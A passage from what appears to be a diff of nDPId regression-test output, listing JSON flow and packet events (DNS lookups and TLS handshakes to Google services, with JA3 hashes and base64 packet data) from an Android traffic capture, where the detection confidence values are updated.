{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454871292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871292,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq9RAAEARCXbAqAIQwKgCAbUXADUALUF1Da4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454871294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871294,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRfN0AAEAReF3AqAIBwKgCEAA1tRcAPWwTDa6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454871343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1582454871343,"pkt":"xiwDYGpkTGr2n\/YnCABFAABQq9VAAEARCWbAqAIQwKgCAYtpADUAPJHqlgwBAAABAAAAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454871383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1582454871383,"pkt":"TGr2n\/YnxiwDYGpkCABFAABgqGIAAEARTMnAqAIBwKgCEAA1i2kATI9glgyBgAABAAEAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAALIABKzZFEo="} -00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} +00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454871496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871496,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq+5AAEARCVzAqAIQwKgCAVlCADUALUQf0TEBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454871536,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871536,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRnZYAAEARV6TAqAIBwKgCEAA1WUIAPff70TGBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 